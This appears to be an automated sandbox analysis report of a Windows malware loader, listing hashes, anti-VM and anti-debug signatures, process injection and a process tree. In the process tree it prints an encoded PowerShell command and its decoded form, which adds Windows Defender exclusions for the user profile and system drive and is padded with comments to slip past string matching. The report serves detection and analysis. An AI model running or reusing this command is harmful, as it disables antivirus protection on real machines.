Analysis
max time kernel: 32s
max time network: 22s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 15/07/2023, 22:34
Behavioral task: behavioral1
Sample: Loader_.exe
Resource: win7-20230712-en
General
Target: Loader_.exe
Size: 21.0MB
MD5: 5c68101e796d08e0f5a0c9f5bc78cc80
SHA1: d0c59230ffec87ae971b0cd1e8a3a5dc0628bb03
SHA256: b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec
SHA512: e8bb3e3389c3f149fa34533667e5d86902521037d3b9a8d5bf95598be96f78365777ca76d614bbdc9361b35b9006b2b093a4a2f678064e093a5fbdfb3d2e917a
SSDEEP: 393216:6wPBZ5c2iENnfa5v3InT8OSmJ8pzV24UwwSXSDvRIrFoXYj4aUWHe+QLIrssSCwQ:6uP3isnfa5f/mKZimkqrFoFaU3Ipxr
Malware Config
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  description   ioc                                          Process
  Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  Loader_.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description        ioc                                                              Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Loader_.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   Loader_.exe

Executes dropped EXE (4 IoCs)
  pid   Process
  2832  compiled.exe
  2684  ProgressBarSplash.exe
  1160  OMM Loader.exe
  1208  Process not Found

Loads dropped DLL (3 IoCs)
  pid   Process
  2244  Loader_.exe
  2832  compiled.exe
  2832  compiled.exe

Obfuscated with Agile.Net obfuscator (3 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  resource                                     yara_rule
  behavioral1/files/0x0008000000012024-61.dat  agile_net
  behavioral1/files/0x0008000000012024-65.dat  agile_net
  behavioral1/files/0x0008000000012024-66.dat  agile_net

YARA rule "themida" matched in memory of the main process (3 IoCs)
  resource                                                                     yara_rule
  behavioral1/memory/2244-54-0x0000000000400000-0x0000000002772000-memory.dmp  themida
  behavioral1/memory/2244-56-0x0000000000400000-0x0000000002772000-memory.dmp  themida
  behavioral1/memory/2244-64-0x0000000000400000-0x0000000002772000-memory.dmp  themida

Checks whether UAC is enabled (1 IoC)
  description        ioc                                                                                   Process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Loader_.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  pid   Process
  2244  Loader_.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  2436  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  2436  powershell.exe

Suspicious use of WriteProcessMemory (16 IoCs; each of the four distinct rows below was recorded four times)
  description                       pid   Process       procid_target
  PID 2244 wrote to memory of 2436  2244  Loader_.exe   28
  PID 2244 wrote to memory of 2832  2244  Loader_.exe   30
  PID 2832 wrote to memory of 2684  2832  compiled.exe  31
  PID 2832 wrote to memory of 1160  2832  compiled.exe  32
Processes

1. C:\Users\Admin\AppData\Local\Temp\Loader_.exe (PID 2244)
   Command line: "C:\Users\Admin\AppData\Local\Temp\Loader_.exe"
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Loads dropped DLL
   - Checks whether UAC is enabled
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2436, spawned by PID 2244)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="
      The -EncodedCommand argument is base64 over UTF-16LE text; decoded, it reads:
      <#kex#>Add-MpPreference <#wcj#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#lyb#> -Force <#wwz#>
      That is, the loader adds Windows Defender path exclusions covering the entire user profile and the system drive; the <#...#> block comments are inert padding that only breaks naive string matching on the command line, so detection should key on the decoded Add-MpPreference -ExclusionPath call rather than the raw encoded form.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Users\Admin\compiled.exe (PID 2832, spawned by PID 2244)
      Command line: "C:\Users\Admin\compiled.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe (PID 2684, spawned by PID 2832)
         Command line: "C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe" -unpacking
         - Executes dropped EXE

      3. C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe (PID 1160, spawned by PID 2832)
         Command line: "C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe"
         - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads